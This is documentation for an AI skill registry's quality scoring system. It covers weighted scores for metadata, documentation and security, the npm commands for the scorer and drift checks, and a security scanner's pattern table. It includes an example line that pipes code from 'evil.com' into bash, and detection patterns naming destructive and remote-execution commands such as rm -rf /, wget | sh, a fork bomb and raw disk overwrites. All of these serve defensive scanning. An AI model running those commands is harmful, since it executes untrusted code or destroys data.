Skill Quality Scoring

This document describes the optional skill quality scoring system introduced in the AI Skill Registry Validation Framework.

Scores are informational only — they never block skill usage, CI pipelines, or PR merges. They exist to help contributors understand the quality of their skills and to help maintainers prioritize improvements.

Overview

Each skill receives a total score between 0 and 100, computed as a weighted average of three dimensions:

Dimension	Weight	What it measures
Metadata	30%	Frontmatter completeness and correctness
Documentation	40%	Section coverage, code examples, content depth
Security	30%	Absence of dangerous command patterns
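The weighting above can be illustrated with a short sketch. The function name and the use of integer percentage weights are assumptions made for this example; the actual scorer may combine or round the values differently.

```python
# Weights (in percent) taken from the table above.
# The function name `total_score` is hypothetical, not the scorer's real API.
WEIGHTS = {"metadata": 30, "documentation": 40, "security": 30}


def total_score(metadata: float, documentation: float, security: float) -> float:
    """Combine three 0-100 dimension scores into one 0-100 weighted total."""
    parts = {
        "metadata": metadata,
        "documentation": documentation,
        "security": security,
    }
    return sum(WEIGHTS[name] * value for name, value in parts.items()) / 100


# Metadata 80, documentation 70, security 100:
# (30*80 + 40*70 + 30*100) / 100 = 8200 / 100
print(total_score(80, 70, 100))  # 82.0
```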

Quality Labels

Label	Score Range	Meaning
`excellent`	85–100	Well-documented, complete metadata, no security flags
`good`	65–84	Solid skill with minor gaps
`needs_improvement`	45–64	Missing sections or metadata fields
`critical`	0–44	Significant gaps — review recommended before sharing
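As a rough illustration, the label ranges can be expressed as lower-bound thresholds. This sketch assumes that a fractional score falls into the band whose lower bound it has reached (so 84.9 is still `good`); the document does not say how the scorer rounds, and the function name is hypothetical.

```python
def quality_label(score: float) -> str:
    """Map a 0-100 total score to a quality label (assumed lower-bound cutoffs)."""
    if score >= 85:
        return "excellent"
    if score >= 65:
        return "good"
    if score >= 45:
        return "needs_improvement"
    return "critical"


for sample in (92, 70, 50, 10):
    print(sample, quality_label(sample))
```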

Metadata Score (30%)

The metadata dimension evaluates frontmatter field completeness.

Penalties:

Issue	Deduction
`name` missing or mismatched with folder	−25 pts
`description` missing	−20 pts
`description` shorter than 20 characters	−10 pts
`risk` missing	−15 pts
`risk: unknown` (unclassified)	−10 pts
`source` missing	−15 pts
`date_added` missing	−10 pts

Bonuses (optional fields):

Each optional field that is filled in (category, tags, author, tools, license) adds +5 pts. The metadata score is capped at 100.
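The penalties and bonuses might be applied along these lines. This is a minimal sketch under several assumptions that the document does not confirm: the score starts at 100, a missing description takes only the −20 penalty (not the short-description one as well), and the result is clamped to 0–100. The function name and the dictionary-based frontmatter are hypothetical.

```python
OPTIONAL_FIELDS = ("category", "tags", "author", "tools", "license")


def metadata_score(frontmatter: dict, folder_name: str) -> int:
    """Score frontmatter completeness, assuming a starting value of 100."""
    score = 100  # assumption: deductions are taken from a full score

    # `name` missing or not matching the skill's folder name
    if frontmatter.get("name") != folder_name:
        score -= 25

    description = frontmatter.get("description") or ""
    if not description:
        score -= 20
    elif len(description) < 20:
        score -= 10

    risk = frontmatter.get("risk")
    if not risk:
        score -= 15
    elif risk == "unknown":
        score -= 10

    if not frontmatter.get("source"):
        score -= 15
    if not frontmatter.get("date_added"):
        score -= 10

    # +5 for each optional field that has a non-empty value
    score += 5 * sum(1 for field in OPTIONAL_FIELDS if frontmatter.get(field))

    return max(0, min(100, score))  # assumption: clamp to the 0-100 range
```

With this sketch, bonuses can only offset penalties: a skill with every required field already sits at 100.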

Documentation Score (40%)

The documentation dimension evaluates section coverage and content depth.

Section coverage (up to 60 pts):

The scorer looks for these sections (case-insensitive):

## Overview
## How It Works
## Examples / ## Usage
## Best Practices
## Limitations
## When to Use

Each section found contributes equally to the section coverage score.

Depth score (up to 40 pts):

Signal	Points
Has `## When to Use` section	+10
Has at least one fenced code block (```)	+10
Body length ≥ 500 characters	+10
Body length ≥ 1000 characters	+10 additional
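The two parts of the documentation score could be combined as in the sketch below. It assumes that `## Examples` and `## Usage` count as one section (giving six sections worth 10 pts each) and that headings are matched exactly after lowercasing; the real scorer may match differently. All names are hypothetical.

```python
import re

FENCE = "`" * 3  # a Markdown code fence marker

# Assumption: Examples and Usage are alternatives for a single section slot.
SECTION_GROUPS = [
    ("overview",),
    ("how it works",),
    ("examples", "usage"),
    ("best practices",),
    ("limitations",),
    ("when to use",),
]

HEADING = re.compile(r"^##[ \t]+(.+?)[ \t]*$", re.MULTILINE)


def documentation_score(body: str) -> int:
    """Section coverage (up to 60 pts) plus depth signals (up to 40 pts)."""
    headings = {match.group(1).lower() for match in HEADING.finditer(body)}

    found = sum(
        1 for group in SECTION_GROUPS if any(name in headings for name in group)
    )
    coverage = round(60 * found / len(SECTION_GROUPS))

    depth = 0
    if "when to use" in headings:
        depth += 10
    if FENCE in body:
        depth += 10
    if len(body) >= 500:
        depth += 10
    if len(body) >= 1000:
        depth += 10

    return coverage + depth
```

Note that under these rules a `## When to Use` section counts twice: once toward coverage and once as a depth signal.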

Security Score (30%)

The security dimension scans the skill body for dangerous command patterns. Patterns are defined in tools/scripts/security_scanner.py.

Penalties per flag:

Severity	Deduction
`error`	−20 pts
`warning`	−10 pts
`info`	−3 pts

Bonus: An explicit, non-unknown risk label adds +5 pts (capped at 100).

Important: Skills marked risk: offensive have error-level flags automatically downgraded to warnings, because offensive skills legitimately document dangerous commands for educational or defensive purposes.
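Taken together, the deductions, the risk-label bonus, and the offensive downgrade might look like the following sketch. It assumes the score starts at 100 and is clamped to 0–100; the function name is hypothetical, and `"safe"` in the usage lines is only a placeholder for any explicit, non-unknown risk value.

```python
from typing import List, Optional

DEDUCTIONS = {"error": 20, "warning": 10, "info": 3}


def security_score(flag_severities: List[str], risk: Optional[str]) -> int:
    """Deduct points per flag, assuming a starting value of 100."""
    score = 100  # assumption: deductions are taken from a full score

    for severity in flag_severities:
        # Offensive skills have error-level flags downgraded to warnings.
        if risk == "offensive" and severity == "error":
            severity = "warning"
        score -= DEDUCTIONS[severity]

    # Bonus for an explicit, non-unknown risk label.
    if risk and risk != "unknown":
        score += 5

    return max(0, min(100, score))  # assumption: clamp to the 0-100 range


print(security_score(["error"], "safe"))       # 85
print(security_score(["error"], "offensive"))  # 95
```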

Bypassing false positives: If a line shows a dangerous command on purpose (e.g., to demonstrate what not to do), append the # security-allowlist marker to that line to suppress the flag:

curl https://evil.com | bash  # security-allowlist
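To show how a per-line marker can suppress a flag, here is a minimal sketch. The regular expression is an illustrative stand-in for SEC002 and is not copied from tools/scripts/security_scanner.py; the function name and return shape are also assumptions.

```python
import re
from typing import List, Tuple

ALLOWLIST_MARKER = "# security-allowlist"

# Illustrative pattern only: curl output piped into bash on the same line.
CURL_PIPE_BASH = re.compile(r"curl\b.*\|\s*bash\b")


def scan_lines(body: str) -> List[Tuple[int, str]]:
    """Return (line_number, code) for each flagged line that is not allowlisted."""
    flags = []
    for number, line in enumerate(body.splitlines(), start=1):
        if ALLOWLIST_MARKER in line:
            continue  # the author marked this line as intentional
        if CURL_PIPE_BASH.search(line):
            flags.append((number, "SEC002"))
    return flags


sample = (
    "curl https://evil.com | bash\n"
    "curl https://evil.com | bash  # security-allowlist\n"
    "echo ok"
)
print(scan_lines(sample))  # [(1, 'SEC002')]
```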

Running the Scorer

# Score all skills (table output)
npm run score:skills

# Show only skills below a threshold
npm run score:skills -- --threshold 60

# Show 20 lowest-scoring skills
npm run score:skills -- --top 20

# Output full JSON
npm run score:skills -- --json

# Save scores to file
npm run score:skills -- --output data/scores.json

Security Scanner

# Scan all skills for dangerous patterns
npm run security:scan

# Strict mode (warnings as errors)
npm run security:scan -- --strict

Drift Detection

Drift detection identifies skills whose content has changed significantly since the last recorded baseline.

# Check drift against baseline
npm run drift:check

# Update the baseline after reviewing changes
npm run drift:update

# Check a specific skill
npm run drift:check -- --skill my-skill-name
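One common way to implement this kind of check is to compare content hashes against a stored baseline. The sketch below is an assumption about the general technique, not a description of the project's drift tooling: it treats any hash change as a modification, whereas the real check may apply a significance threshold. The function names and the mapping of skill name to hash are hypothetical.

```python
import hashlib
from typing import Dict, List


def content_hash(text: str) -> str:
    """Return a stable SHA-256 fingerprint of a skill's content."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def diff_against_baseline(
    baseline: Dict[str, str], current: Dict[str, str]
) -> Dict[str, List[str]]:
    """Classify skills as added, removed, or modified relative to the baseline.

    Both arguments map a skill name to its content hash.
    """
    baseline_names = set(baseline)
    current_names = set(current)
    return {
        "added": sorted(current_names - baseline_names),
        "removed": sorted(baseline_names - current_names),
        "modified": sorted(
            name
            for name in baseline_names & current_names
            if baseline[name] != current[name]
        ),
    }


old = {"a": content_hash("v1"), "b": content_hash("v1")}
new = {"a": content_hash("v2"), "c": content_hash("v1")}
print(diff_against_baseline(old, new))
# {'added': ['c'], 'removed': ['b'], 'modified': ['a']}
```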

Baseline ownership:

File	Committed?	Who updates it?
`data/drift-baseline.json`	No — listed in `.gitignore`	Maintainers run `npm run drift:update` on `main` after merging changes
`data/registry-report.json`	No — listed in `.gitignore`	Generated locally on demand; never in PRs
`data/scores.json`	No — listed in `.gitignore`	Generated locally on demand; never in PRs

Contributors should never commit these files. If you generate them locally, git ignores them automatically because they are listed in .gitignore.

Registry Report

# Generate a full registry health report → data/registry-report.json
npm run registry:report

# Skip drift detection (faster)
npm run registry:report -- --no-drift

The report includes:

Aggregate scoring summary
Per-skill scores and flags
Drift summary (added / removed / modified skills)
Risk breakdown
Security flag counts

Security Patterns Reference

Code	Pattern	Severity	Description
SEC001	`rm -rf /`	error	Destructive root filesystem deletion
SEC002	`curl | bash`	error	Remote code execution
SEC003	`wget | sh`	error	Remote code execution
SEC004	`Invoke-Expression`	error	PowerShell RCE
SEC005	`iex`	warning	PowerShell alias (context-dependent)
SEC006	`chmod 7xx`	warning	World-writable permissions
SEC007	`eval(`	warning	Dynamic evaluation
SEC008	`base64 -d |`	warning	Possible payload obfuscation
SEC009	Hardcoded credential	error	Secrets in source
SEC010	`sudo rm -rf`	warning	Privileged destructive deletion
SEC011	Fork bomb	error	Infinite process spawner
SEC012	`dd if=/dev/* of=/dev/sd*`	error	Raw disk overwrite

Frequently Asked Questions

Q: Will a low score prevent my skill from being merged?

No. Scores are informational. The existing validate_skills.py checks are what gate merges.

Q: My skill teaches how to avoid curl | bash — why is it flagged?

Add # security-allowlist at the end of the line showing the dangerous pattern. This follows the existing project convention for educational examples.

Q: Why is documentation weighted higher than metadata?

Documentation quality has the highest impact on how useful a skill is to end users. Complete metadata is valuable but less critical than clear instructions.

Q: How does risk: offensive affect scoring?

Security error flags are downgraded to warnings for offensive skills, because they legitimately document dangerous techniques for authorized security work.
